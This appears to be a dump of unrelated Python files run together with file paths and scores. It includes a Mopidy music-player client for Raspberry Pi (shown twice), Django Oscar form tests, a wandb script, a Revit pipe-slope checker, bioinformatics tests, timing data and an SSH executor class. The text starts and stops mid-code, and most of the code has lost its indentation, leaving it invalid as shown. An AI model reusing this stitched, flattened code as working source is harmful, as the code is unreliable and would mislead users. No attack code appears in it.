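    uppercase = sum(c.isupper() for c in password)
    lowercase = sum(c.islower() for c in password)
    symbols = sum(not c.isalnum() for c in password)  # "symbol" = non-alphanumeric
    return (len(password) >= length_min
            and digits >= amount_digits
            and uppercase >= amount_uppercase
            and lowercase >= amount_lowercase
            and symbols >= amount_symbols)

assert not passes_policy('short1A!!!')                     # fails length_min
assert passes_policy('aa' + 'B' * 10 + '1!!!' + 'x' * 10)  # meets every rule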
from mpd import MPDClient
from MopidyConfig import MopidyConfig
import RPi.GPIO as gpio
import os.path
import time
import json
import logging
import threading
RED = [True, False, False]
GREEN = [False, True, False]
BLUE = [False, False, True]
YELLOW = [True, True, False]
WHITE = [True, True, True]
class MopidyClient(MopidyConfig):
_red_led = 25
_green_led = 23
_blue_led = 24
def __init__(self):
self._client = None
self._currentPlaylistId = ""
self._currentPlaylistName = ""
self._stateFileContent = { 'playlistId': '', 'track': 0, 'time': 0 }
self.initRgbLed()
self.loadStateFile()
def initRgbLed(self):
gpio.setmode(gpio.BCM)
gpio.setup(self._red_led, gpio.OUT)
gpio.setup(self._green_led, gpio.OUT)
gpio.setup(self._blue_led, gpio.OUT)
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def led_on(self, color):
if color[0]:
gpio.output(self._red_led, gpio.HIGH)
if color[1]:
gpio.output(self._green_led, gpio.HIGH)
if color[2]:
gpio.output(self._blue_led, gpio.HIGH)
def led_off(self):
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def connect(self):
try:
if self._client is None:
self._client = MPDClient()
self._client.timeout = 60
self._client.idletimeout = None
self._client.connect("localhost", 6600)
except Exception as e:
print("ERROR1: " + str(e))
def disconnect(self):
try:
if self._client is not None:
self._client.close()
self._client.disconnect()
except Exception as e:
print("ERROR2: " + str(e))
self._client = None
def updateStatus(self):
result = {}
try:
self.connect()
result["playlistId"] = self._currentPlaylistId
result["playlistName"] = self._currentPlaylistName.replace("[USB] ", "")
status = self._client.status()
result["tracks"] = int(status["playlistlength"])
result["state"] = status["state"]
if "song" in status:
result["track"] = int(status["song"])
result["time"] = float(status.get('elapsed', 0.0))
curr = self._client.currentsong()
result["duration"] = float(curr["time"])
result["album"] = curr.get("album", "").strip()
result["artist"] = curr.get("artist", "").strip()
result["title"] = curr.get("title", "").strip()
if (result["track"] == result["tracks"] - 1) and (result["duration"] - result["time"] < 5):
self.updateStateFileContent(self._currentPlaylistId, 0, 0)
else:
self.updateStateFileContent(self._currentPlaylistId, int(status["song"]), float(status.get('elapsed', 0.0)))
except Exception as e:
print("ERROR3: " + str(e))
result["error"] = str(e)
return result
def stop(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play' or state == 'pause':
self._client.stop()
except Exception as e:
print("ERROR4: " + str(e))
def togglePlayPause(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play':
self._client.pause(1)
elif state == 'pause':
self._client.pause(0)
else:
self._client.play(0)
except Exception as e:
print("ERROR5: " + str(e))
def skipToTrack(self, track):
try:
self.connect()
status = self._client.status()
tracks = int(status["playlistlength"])
if tracks > 0:
track = max(0, min(track, tracks - 1))
self._client.play(track)
except Exception as e:
print("ERROR6: " + str(e))
def skipToNextTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
if "nextsong" in status and "song" in status:
tracks = int(status["playlistlength"])
track = int(status["song"]) + count
track = min(track, tracks - 1)
self._client.play(track)
else:
self.seek(count * 60)
except Exception as e:
print("ERROR7: " + str(e))
def skipToPreviousTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
currentTrack = int(status.get("song", "-1"))
if currentTrack > 0:
track = max(0, currentTrack - count)
self._client.play(track)
else:
self.seek(count * -60)
except Exception as e:
print("ERROR8: " + str(e))
def skipToStart(self):
try:
self.connect()
status = self._client.status()
if int(status["playlistlength"]) > 0:
self._client.play(0)
except Exception as e:
print("ERROR9: " + str(e))
def seek(self, deltaInSeconds):
try:
self.connect()
if self._client.status()['state'] == 'stop':
return
if deltaInSeconds > 0:
status = self._client.status()
if "nextsong" not in status:
currentTrack = int(status.get("song", "-1"))
if currentTrack > -1:
currentTrackTime = int(round(float(status.get('elapsed', 0.0))))
currentTrackDuration = int(self._client.playlistinfo()[currentTrack]['time'])
if currentTrackTime + deltaInSeconds >= currentTrackDuration - 1:
return
self._client.seekcur("+" + str(deltaInSeconds))
else:
self._client.seekcur(str(deltaInSeconds))
except Exception as e:
print("ERROR10: " + str(e))
def loadPlaylist(self, id):
if self._currentPlaylistId == id and (id == "" or self._currentPlaylistName != ""):
return
newId = self._currentPlaylistId != id and self._currentPlaylistId != ""
self._currentPlaylistId = id
prevPlaylistName = self._currentPlaylistName
self._currentPlaylistName = ""
try:
self.connect()
if prevPlaylistName != "":
self._client.clear()
if id != "":
playlists = self._client.listplaylists()
selectedPlaylist = next((p for p in playlists if p["playlist"].find(id) > -1), None)
if selectedPlaylist is not None:
self.led_on(GREEN)
self._currentPlaylistName = selectedPlaylist["playlist"]
self._client.clear()
self._client.load(selectedPlaylist["playlist"])
if self._stateFileContent.get("playlistId", "") == id:
track = self._stateFileContent.get("track", 0)
self._client.play(track)
if float(self._stateFileContent.get("time", 0)) > 5:
self._client.pause(1)
time.sleep(1)  # hack: give mpd a moment to start playback before seeking
self._client.seek(track, str(self._stateFileContent.get("time", 0)))
self._client.pause(0)
else:
self._client.play(0)
elif newId:
self.led_on(RED)
except Exception as e:
print("ERROR11: " + str(e))
self.led_on(YELLOW)
time.sleep(1)
self.led_off()
def loadStateFile(self):
for i in range(2):
fname = 'state{0}.json'.format(i)
try:
if os.path.isfile(fname):
with open(fname, 'r') as f:
self._stateFileContent = json.load(f)
return
except Exception as e:
print("ERROR12: " + str(e))
def updateStateFileContent(self, playlistId, track, time):
if playlistId == "" or playlistId == None:
return
trackChanged = playlistId != self._stateFileContent.get("playlistId", "") or track != self._stateFileContent.get("track", 0)
timeChanged = time != self._stateFileContent["time"]
if trackChanged or int(time) % 5 == 0:
self._stateFileContent["playlistId"] = playlistId
self._stateFileContent["track"] = track
self._stateFileContent["time"] = time
if trackChanged or (timeChanged and int(time) % 60 == 0):
self.saveStateFile()
def saveStateFile(self):
for i in range(2):
try:
fname = 'state{0}.json'.format(i)
with open(fname, 'w') as f:
json.dump(self._stateFileContent, f)
except Exception as e:
print("ERROR13: " + str(e)) | MopidyClient.py | from mpd import MPDClient
from MopidyConfig import MopidyConfig
import RPi.GPIO as gpio
import os.path
import time
import json
import logging
import threading
RED = [True, False, False]
GREEN = [False, True, False]
BLUE = [False, False, True]
YELLOW = [True, True, False]
WHITE = [True, True, True]
class MopidyClient(MopidyConfig):
_red_led = 25
_green_led = 23
_blue_led = 24
def __init__(self):
self._client = None
self._currentPlaylistId = ""
self._currentPlaylistName = ""
self._stateFileContent = { 'playlistId': '', 'track': 0, 'time': 0 }
self.initRgbLed()
self.loadStateFile()
def initRgbLed(self):
gpio.setmode(gpio.BCM)
gpio.setup(self._red_led, gpio.OUT)
gpio.setup(self._green_led, gpio.OUT)
gpio.setup(self._blue_led, gpio.OUT)
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def led_on(self, color):
if color[0]:
gpio.output(self._red_led, gpio.HIGH)
if color[1]:
gpio.output(self._green_led, gpio.HIGH)
if color[2]:
gpio.output(self._blue_led, gpio.HIGH)
def led_off(self):
gpio.output(self._red_led, gpio.LOW)
gpio.output(self._green_led, gpio.LOW)
gpio.output(self._blue_led, gpio.LOW)
def connect(self):
try:
if self._client == None:
self._client = MPDClient()
self._client.timeout = 60
self._client.idletimeout = None
self._client.connect("localhost", 6600)
except Exception as e:
print("ERROR1: " + str(e))
def disconnect(self):
try:
if self._client != None:
self._client.close()
self._client.disconnect()
except Exception as e:
print("ERROR2: " + str(e))
self._client = None
def updateStatus(self):
result = {}
try:
self.connect()
result["playlistId"] = self._currentPlaylistId
result["playlistName"] = self._currentPlaylistName.replace("[USB] ", "")
status = self._client.status()
result["tracks"] = int(status["playlistlength"])
result["state"] = status["state"]
if "song" in status:
result["track"] = int(status["song"])
result["time"] = float(status.get('elapsed', 0.0))
curr = self._client.currentsong()
result["duration"] = float(curr["time"])
result["album"] = curr.get("album", "").strip()
result["artist"] = curr.get("artist", "").strip()
result["title"] = curr.get("title", "").strip()
if (result["track"] == result["tracks"] - 1) and (result["duration"] - result["time"] < 5):
self.updateStateFileContent(self._currentPlaylistId, 0, 0)
else:
self.updateStateFileContent(self._currentPlaylistId, int(status["song"]), float(status.get('elapsed', 0.0)))
except Exception as e:
print("ERROR3: " + str(e))
result["error"] = str(e)
return result
def stop(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play' or state == 'pause':
self._client.stop()
except Exception as e:
print("ERROR4: " + str(e))
def togglePlayPause(self):
try:
self.connect()
state = self._client.status()['state']
if state == 'play':
self._client.pause(1)
elif state == 'pause':
self._client.pause(0)
else:
self._client.play(0)
except Exception as e:
print("ERROR5: " + str(e))
def skipToTrack(self, track):
try:
self.connect()
status = self._client.status()
tracks = int(status["playlistlength"])
if tracks > 0:
track = max(0, min(track, tracks - 1))
self._client.play(track)
except Exception as e:
print("ERROR6: " + str(e))
def skipToNextTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
if "nextsong" in status and "song" in status:
tracks = int(status["playlistlength"])
track = int(status["song"]) + count
track = min(track, tracks - 1)
self._client.play(track)
else:
self.seek(count * 60)
except Exception as e:
print("ERROR7: " + str(e))
def skipToPreviousTrack(self, count):
try:
if count <= 0:
return
self.connect()
status = self._client.status()
currentTrack = int(status.get("song", "-1"))
if currentTrack > 0:
track = max(0, currentTrack - count)
self._client.play(track)
else:
self.seek(count * -60)
except Exception as e:
print("ERROR8: " + str(e))
def skipToStart(self):
try:
self.connect()
status = self._client.status()
if int(status["playlistlength"]) > 0:
self._client.play(0)
except Exception as e:
print("ERROR9: " + str(e))
def seek(self, deltaInSeconds):
try:
self.connect()
if self._client.status()['state'] == 'stop':
return
if deltaInSeconds > 0:
status = self._client.status()
if "nextsong" not in status:
currentTrack = int(status.get("song", "-1"))
if currentTrack > -1:
currentTrackTime = int(round(float(status.get('elapsed', 0.0))))
currentTrackDuration = int(self._client.playlistinfo()[currentTrack]['time'])
if currentTrackTime + deltaInSeconds >= currentTrackDuration - 1:
return
self._client.seekcur("+" + str(deltaInSeconds))
else:
self._client.seekcur(str(deltaInSeconds))
except Exception as e:
print("ERROR10: " + str(e))
def loadPlaylist(self, id):
if self._currentPlaylistId == id and (id == "" or self._currentPlaylistName != ""):
return
newId = self._currentPlaylistId != id and self._currentPlaylistId != ""
self._currentPlaylistId = id
prevPlaylistName = self._currentPlaylistName
self._currentPlaylistName = ""
try:
self.connect()
if prevPlaylistName != "":
self._client.clear()
if id != "":
playlists = self._client.listplaylists()
selectedPlaylist = next((p for p in playlists if p["playlist"].find(id) > -1), None)
if selectedPlaylist != None:
self.led_on(GREEN)
self._currentPlaylistName = selectedPlaylist["playlist"]
self._client.clear()
self._client.load(selectedPlaylist["playlist"])
if self._stateFileContent.get("playlistId", "") == id:
track = self._stateFileContent.get("track", 0)
self._client.play(track)
if float(self._stateFileContent.get("time", 0)) > 5:
self._client.pause(1)
time.sleep(1) #hack
self._client.seek(track, str(self._stateFileContent.get("time", 0)))
self._client.pause(0)
else:
self._client.play(0)
elif newId:
self.led_on(RED)
except Exception as e:
print("ERROR11: " + str(e))
self.led_on(YELLOW)
time.sleep(1)
self.led_off()
def loadStateFile(self):
for i in range(2):
fname = 'state{0}.json'.format(i)
try:
if os.path.isfile(fname):
with open(fname, 'r') as f:
self._stateFileContent = json.load(f)
return
except Exception as e:
print("ERROR12: " + str(e))
def updateStateFileContent(self, playlistId, track, time):
if playlistId == "" or playlistId == None:
return
trackChanged = playlistId != self._stateFileContent.get("playlistId", "") or track != self._stateFileContent.get("track", 0)
timeChanged = time != self._stateFileContent["time"]
if trackChanged or int(time) % 5 == 0:
self._stateFileContent["playlistId"] = playlistId
self._stateFileContent["track"] = track
self._stateFileContent["time"] = time
if trackChanged or (timeChanged and int(time) % 60 == 0):
self.saveStateFile()
def saveStateFile(self):
for i in range(2):
try:
fname = 'state{0}.json'.format(i)
with open(fname, 'w') as f:
json.dump(self._stateFileContent, f)
except Exception as e:
print("ERROR13: " + str(e)) | 0.121204 | 0.055132 |
from datetime import date, datetime
from unittest import mock
import pytz
from django.conf import settings
from django.core import mail
from django.core.exceptions import ValidationError
from django.test import TestCase, override_settings
from oscar.apps.customer.forms import (
EmailUserCreationForm, OrderSearchForm, PasswordResetForm)
from oscar.test.factories import UserFactory
class TestEmailUserCreationForm(TestCase):
@mock.patch('oscar.apps.customer.forms.validate_password')
def test_validator_passed_populated_user(self, mocked_validate):
mocked_validate.side_effect = ValidationError('That password is rubbish')
form = EmailUserCreationForm(data={'email': '<EMAIL>', 'password1': '<PASSWORD>', 'password2': '<PASSWORD>'})
self.assertFalse(form.is_valid())
mocked_validate.assert_called_once_with('terry', form.instance)
self.assertEqual(mocked_validate.call_args[0][1].email, '<EMAIL>')
self.assertEqual(form.errors['password2'], ['That password is rubbish'])
class TestPasswordResetForm(TestCase):
def test_user_email_unicode_collision(self):
# Regression test for CVE-2019-19844, which Oscar's PasswordResetForm
# was vulnerable to because it had overridden the save() method.
UserFactory(username='mike123', email='<EMAIL>')
UserFactory(username='mike456', email='<EMAIL>')
form = PasswordResetForm({'email': '<EMAIL>'})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, ['<EMAIL>'])
class TestOrderSearchForm(TestCase):
@override_settings(TIME_ZONE='Africa/Nairobi')
def test_get_filters(self):
form = OrderSearchForm(data={
'date_from': date(2021, 1, 1),
'date_to': date(2021, 1, 10),
'order_number': '100'
})
self.assertTrue(form.is_valid())
filters = form.get_filters()
nbi = pytz.timezone(settings.TIME_ZONE)
self.assertEqual(filters, {
'date_placed__gte': nbi.localize(datetime(2021, 1, 1)),
'date_placed__lte': nbi.localize(datetime(2021, 1, 10, 23, 59, 59, 999999)),
'number__contains': '100',
}) | tests/unit/customer/test_forms.py | 0.557845 | 0.262777 |
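The timezone assertions above hinge on one convention: an inclusive date_to is widened to the last microsecond of that day before localizing, so the whole final day matches. A standalone sketch of that convention (the form class itself is not reproduced here; the filter keys mirror the test):

from datetime import date, datetime, time
import pytz

def date_range_filters(date_from, date_to, tz_name="Africa/Nairobi"):
    tz = pytz.timezone(tz_name)
    # Lower bound: midnight opening date_from; upper bound: 23:59:59.999999
    # on date_to (time.max), so the final day is fully included.
    return {
        "date_placed__gte": tz.localize(datetime.combine(date_from, time.min)),
        "date_placed__lte": tz.localize(datetime.combine(date_to, time.max)),
    }

print(date_range_filters(date(2021, 1, 1), date(2021, 1, 10)))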
import wandb
from src.Data import Data
from src.configurations import Configuration, WandbLogs
from src.models.BestPreTrainedModelForAStation import BestPreTrainedModelForAStation
from src.models.PerStationModel import PerStationModel
from src.run_utils import LogKeys, train_predict_evaluate_log_for_model_and_data
def run(config: Configuration = Configuration()):
wandb_run = wandb.init(project=config.wandb_project_name,
entity=config.wandb_entity,
mode=config.wandb_mode,
notes="Best trained model",
tags=['Best trained model', 'model per station'],
config=config.as_dict())
# Reload the Configuration (to allow for sweeps)
configuration = Configuration(**wandb.config)
# Load training and validation data
training_dev_data = Data(config.no_nan_in_bikes, config.development_data_path + config.dev_data_filename)
val_data = Data(config.no_nan_in_bikes, config.development_data_path + config.val_data_filename)
# Model
per_station_model = PerStationModel(configuration, training_dev_data, BestPreTrainedModelForAStation, True)
log_keys = {LogKeys.mae_dev.value: WandbLogs.per_station_mae_dev.value,
LogKeys.mae_val.value: WandbLogs.per_station_mae_val.value,
LogKeys.mae_per_station_dev.value: WandbLogs.per_station_mae_per_station_dev.value,
LogKeys.mae_per_station_val.value: WandbLogs.per_station_mae_per_station_val.value,
LogKeys.predictions_dev.value: WandbLogs.per_station_predictions_dev.value,
LogKeys.predictions_val.value: WandbLogs.per_station_predictions_val.value,
}
train_predict_evaluate_log_for_model_and_data(per_station_model, training_dev_data, val_data,
log_keys, wandb_run, configuration.log_predictions_to_wandb)
# Write predictions to csv
if configuration.run_test_predictions:
    test_data = Data(config.no_nan_in_bikes, config.test_data_path)
    per_station_result_test = per_station_model.predict(test_data)
    per_station_result_test.write_to_csv('per_station_model_' + wandb_run.name, configuration)
def main():
run(Configuration())
if __name__ == "__main__":
main() | src/predict_using_trained_models.py | 0.641085 | 0.479382 |
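The "Reload the Configuration" step is what makes sweeps work: wandb.init seeds wandb.config from the passed-in config, a sweep agent can then override individual keys, and rebuilding the configuration object from wandb.config picks those overrides up. A rough sketch of the pattern with a stand-in config class (this Config is illustrative, not the project's Configuration):

import wandb

class Config:
    def __init__(self, lr=0.01, epochs=10):
        self.lr = lr
        self.epochs = epochs

    def as_dict(self):
        return {"lr": self.lr, "epochs": self.epochs}

run = wandb.init(mode="offline", config=Config().as_dict())
# Under a sweep agent, wandb.config now carries the overridden values;
# rebuilding the object makes the rest of the pipeline see them.
config = Config(**wandb.config)
print(config.lr, config.epochs)
run.finish()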
import sys
import ConfigParser
from os.path import expanduser
# Set system path
home = expanduser("~")
cfgfile = open(home + "\\STVTools.ini", 'r')
config = ConfigParser.ConfigParser()
config.read(home + "\\STVTools.ini")
# Master Path
syspath1 = config.get('SysDir','MasterPackage')
sys.path.append(syspath1)
# Built Path
syspath2 = config.get('SysDir','SecondaryPackage')
sys.path.append(syspath2)
import clr, Selection
clr.AddReference('RevitAPI')
clr.AddReference('RevitAPIUI')
clr.AddReference("System")
clr.AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
from Autodesk.Revit.UI import TaskDialog, TaskDialogCommonButtons, TaskDialogResult
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document
from pyrevit import script
__doc__ = 'Print all the irregular pipe slopes and element ids in selection. '\
    'Tolerance at 0.001. ' \
    'Clear list: 12/12, 0.5/12, 0.25/12, 0.125/12, 0.0625/12.'
def isclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
def isnotclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
return abs(a-b) >= max(rel_tol * max(abs(a), abs(b)), abs_tol)
sel_element = Selection.get_selected_elements(doc)
if len(sel_element) == 0:
TaskDialog.Show('Warning', 'Please make selection first')
else:
outprint = script.get_output()
pipes = []
for i in sel_element:
if i.Category.Name == 'Pipes':
pipes.append(i)
print('Found ' + str(len(pipes)) + ' pipes')
# pipes = FilteredElementCollector(doc).OfClass(Pipe).ToElements()
for p in pipes:
slope = p.LookupParameter('Slope').AsDouble()
if slope != 0.0 and slope < 1.1 and isnotclose(slope, 12.0/12) and isnotclose(slope, 0.5/12) and isnotclose(slope, 0.25/12)\
        and isnotclose(slope, 0.125/12) and isnotclose(slope, 0.0625/12):
print(format(outprint.linkify(p.Id))+ ' SLOPE: ' + str(slope*12) + '/foot')
print('End') | CustomExtension.extension/STVTools.tab/MEP Tools.panel/Tools.stack3/Slope.pulldown/irregular.pushbutton/script.py | 0.217421 | 0.092074 |
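Everything in the script above hinges on the absolute tolerance check: a slope counts as regular when it sits within abs_tol of one of the standard pitches in the clear list. A small pure-Python restatement of that predicate (values in feet per foot, as in the script):

def isclose(a, b, rel_tol=1e-08, abs_tol=1e-03):
    return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)

standard_slopes = [12.0/12, 0.5/12, 0.25/12, 0.125/12, 0.0625/12]

def is_irregular(slope):
    # Flat (slope == 0) and near-vertical pipes are skipped, mirroring the script.
    if slope == 0.0 or slope >= 1.1:
        return False
    return not any(isclose(slope, s) for s in standard_slopes)

print(is_irregular(0.25 / 12))  # False: exactly 1/4 inch per foot
print(is_irregular(0.031))      # True: ~3/8 inch per foot, not in the clear list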
from find_gene import find_gene
from batch_find_gene import batch_find_gene
from find_homologues import find_homologues
from find_ipg import find_ipg
from choose_gene import choose_gene
def test_find_gene():
"""
test_find_gene should return the matching DNA accession
number (M22259.1) of protein AAA34866.
"""
expect_gene = find_gene("AAA34866")
assert expect_gene == ["DNA AN: M22259.1"]
def test_batch_find_gene():
"""
test_batch_find_gene should return both genes' corresponding DNA accession
numbers.
"""
expect_batch = batch_find_gene(["AAA34866", "GAX67478"])
assert expect_batch == ['M22259.1', 'BEGW01000001.1']
def test_find_ipg():
"""
test_find_ipg should return the identical proteins of both proteins
provided. GenBank may update, possibly leading to different identical
protein results.
"""
expect_ipg = find_ipg(["AAA34866", "GAX67478"], ipgfilename="testipg.csv")
assert expect_ipg == {'M22259.1': ('387', '2066', 1),
'NC_001136.10': ('270222', '271901', 2),
'NM_001180165.1': ('1', '1680', 1),
'X05062.1': ('391', '2070', 1),
'X95644.1': ('8447', '10126', 2),
'Z74154.1': ('246', '1925', 2),
'BK006938.2': ('270222', '271901', 2),
'CM004297.1': ('288824', '290503', 2),
'LBMA01000004.1': ('288824', '290503', 2),
'HB870545.1': ('387', '2066', 1),
'HC927954.1': ('387', '2066', 1),
'BEGW01000001.1': ('1223469', '1225145', 1),
'CP004724.2': ('264356', '266032', 2),
'CP004740.2': ('253800', '255476', 2),
'CP004750.2': ('264165', '265841', 2),
'DG000040.1': ('258839', '260515', 2)}
def test_find_homologues():
"""
test_find_homologues should return only the 3 results, as specified.
GenBank may update, possibly leading to different BLAST results.
"""
expect_blast1 = find_homologues("AAA34866",max_number=3,
filename="testblast.xml")
assert expect_blast1 == ['NP_010177', 'AJU66839', 'AJU64042']
def test_choose_gene():
"""
test_choose_gene should return the DNA accession numbers, codon adaptation
indexes, start positions and stop positions of the corresponding first two
proteins in testipg.csv with available DNA accession numbers.
"""
expect_CAI = choose_gene("sharp_yeast.txt",ipgfile="testipg.csv")
assert expect_CAI == {'AAA34866.1': ('M22259.1', 0.148, '387', '2066'),
'NP_010177.1': ('NM_001180165.1', 0.148, '1', '1680')} | test_all.py | 0.703957 | 0.541106 |
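Several of these tests pin exact values from live GenBank/BLAST queries, which the docstrings themselves admit can drift. One hedged alternative for the volatile cases is to assert stable invariants instead of full equality; a sketch in the same style, assuming the same find_homologues import as above:

from find_homologues import find_homologues

def test_find_homologues_invariants():
    hits = find_homologues("AAA34866", max_number=3, filename="testblast.xml")
    # Invariants that should survive database updates: the requested cap is
    # respected, and the well-known hit from the strict test is still present.
    assert len(hits) <= 3
    assert "NP_010177" in hits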
def_numtx = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def_scheduleTimes = [152, 277, 404, 537, 663, 789, 915, 1050, 1173, 1300, 1433, 1560, 1686, 1812, 1946, 2071, 2197, 2330, 2457, 2583, 2709, 2843, 2968, 3093, 3227, 3354, 3480, 3607, 3740, 3865, 3990, 4124, 4250, 4377, 4503, 4637, 4762, 4887, 5021, 5147, 5274, 5400, 5534, 5659, 5784, 5919, 6044, 6170, 6296, 6431, 6555, 6681, 6815, 6941, 7068, 7194, 7328, 7452, 7578, 7711]
def_sendTimes = [153, 279, 404, 540, 665, 790, 925, 1050, 1176, 1301, 1436, 1561, 1687, 1821, 1948, 2073, 2198, 2333, 2458, 2584, 2718, 2844, 2969, 3095, 3230, 3355, 3481, 3615, 3741, 3866, 3992, 4126, 4252, 4388, 4512, 4638, 4763, 4889, 5023, 5149, 5274, 5409, 5535, 5660, 5795, 5920, 6056, 6180, 6306, 6431, 6557, 6683, 6817, 6944, 7068, 7203, 7328, 7454, 7579, 7714]
def_cpu_time_leaf = 44656
def_cpu_sleep_time_leaf = 103719
def_cpu_deepsleep_time_leaf = 1823782
def_radio_rx_time_leaf = 6916
def_radio_tx_time_leaf = 73812
high_numtx = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
high_scheduleTimes = [7892, 8018, 8144, 8278, 8403, 8530, 8662, 8789, 8916, 9041, 9175, 9300, 9426, 9559, 9685, 9812, 9938, 10072, 10197, 10323, 10457, 10582, 10709, 10834, 10970, 11094, 11220, 11353, 11480, 11606, 11731, 11866, 11990, 12117, 12250, 12376, 12503, 12628, 12763, 12887, 13014, 13146, 13273, 13400, 13525, 13660, 13784, 13911, 14043, 14170, 14296, 14422, 14557, 14681, 14808, 14940, 15067, 15193, 15319, 15453]
high_sendTimes = [7894, 8019, 8153, 8279, 8405, 8530, 8666, 8790, 8916, 9050, 9176, 9301, 9427, 9562, 9687, 9813, 9947, 10073, 10198, 10324, 10459, 10584, 10709, 10844, 10970, 11095, 11221, 11356, 11482, 11606, 11741, 11875, 11993, 12118, 12253, 12378, 12503, 12638, 12763, 12889, 13014, 13150, 13275, 13400, 13535, 13660, 13787, 13911, 14047, 14171, 14297, 14432, 14557, 14683, 14808, 14944, 15068, 15194, 15328, 15454]
high_cpu_time_leaf = 42449
high_cpu_sleep_time_leaf = 104919
high_cpu_deepsleep_time_leaf = 1823652
high_radio_rx_time_leaf = 6448
high_radio_tx_time_leaf = 73701
low_numtx = [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2]
low_scheduleTimes = [15614, 15739, 15866, 16000, 16126, 16251, 16377, 16511, 16636, 16763, 16896, 17023, 17147, 17274, 17407, 17533, 17660, 17794, 17920, 18044, 18171, 18304, 18430, 18557, 18690, 18817, 18941, 19068, 19201, 19327, 19452, 19587, 19714, 19838, 19965, 20098, 20224, 20350, 20484, 20610, 20735, 20862, 20995, 21121, 21247, 21381, 21507, 21632, 21759, 21891, 22018, 22144, 22278, 22404, 22529, 22655, 22789, 22914, 23041, 23175]
low_sendTimes = [15616, 15741, 15867, 16011, 16127, 16252, 16387, 16512, 16638, 16763, 16899, 17023, 17159, 17293, 17409, 17536, 17660, 17796, 17920, 18046, 18180, 18306, 18432, 18557, 18693, 18817, 18943, 19077, 19203, 19338, 19454, 19590, 19714, 19840, 19974, 20100, 20225, 20351, 20486, 20611, 20737, 20871, 20997, 21122, 21248, 21383, 21508, 21633, 21768, 21894, 22019, 22155, 22279, 22405, 22530, 22665, 22790, 22916, 23042, 23186]
low_cpu_time_leaf = 42164
low_cpu_sleep_time_leaf = 105028
low_cpu_deepsleep_time_leaf = 1825274
low_radio_rx_time_leaf = 7124
low_radio_tx_time_leaf = 74142
def_cpu_time_coordinator = 32136
def_cpu_sleep_time_coordinator = 177725
def_cpu_deepsleep_time_coordinator = 1764911
def_radio_rx_time_coordinator = 2221
def_radio_tx_time_coordinator = 142952
high_cpu_time_coordinator = 29412
high_cpu_sleep_time_coordinator = 177696
high_cpu_deepsleep_time_coordinator = 1765509
high_radio_rx_time_coordinator = 2221
high_radio_tx_time_coordinator = 141609
low_cpu_time_coordinator = 29029
low_cpu_sleep_time_coordinator = 179667
low_cpu_deepsleep_time_coordinator = 1766504
low_radio_rx_time_coordinator = 2273
low_radio_tx_time_coordinator = 142209 | examples/task3/plotting/data/data10m.py | 0.156427 | 0.507507 |
from ...configuration.utilities import enable_yaml_load
from ...exceptions.executorexceptions import CommandExecutionFailure
from ...interfaces.executor import Executor
from ..attributedict import AttributeDict
import asyncio
import asyncssh
@enable_yaml_load("!SSHExecutor")
class SSHExecutor(Executor):
def __init__(self, **parameters):
self._parameters = parameters
self._ssh_connection = None
self._lock = None
async def _establish_connection(self):
for retry in range(1, 10):
try:
return await asyncssh.connect(**self._parameters)
except (
ConnectionResetError,
asyncssh.DisconnectError,
asyncssh.ConnectionLost,
BrokenPipeError,
):
await asyncio.sleep(retry * 10)
return await asyncssh.connect(**self._parameters)  # final attempt after the retry budget: let errors propagate
@property
async def ssh_connection(self):
if self._ssh_connection is None:
async with self.lock:
# Re-check that the connection was not initialized by a different task while waiting for the lock
while self._ssh_connection is None:
self._ssh_connection = await self._establish_connection()
return self._ssh_connection
@property
def lock(self):
# Create the lock lazily, once the tardis event loop is running, to avoid
# "got Future <Future pending> attached to a different loop" exceptions
if self._lock is None:
self._lock = asyncio.Lock()
return self._lock
async def run_command(self, command, stdin_input=None):
ssh_connection = await self.ssh_connection
try:
response = await ssh_connection.run(
command, check=True, input=stdin_input and stdin_input.encode()
)
except asyncssh.ProcessError as pe:
raise CommandExecutionFailure(
message=f"Run command {command} via SSHExecutor failed",
exit_code=pe.exit_status,
stdin=stdin_input,
stdout=pe.stdout,
stderr=pe.stderr,
) from pe
except asyncssh.ChannelOpenError as coe:
# Broken connection will be replaced by a new connection during next call
self._ssh_connection = None
raise CommandExecutionFailure(
message=f"Could not run command {command} due to SSH failure: {coe}",
exit_code=255,
stdout="",
stderr="SSH Broken Connection",
) from coe
else:
return AttributeDict(
stdout=response.stdout,
stderr=response.stderr,
exit_code=response.exit_status,
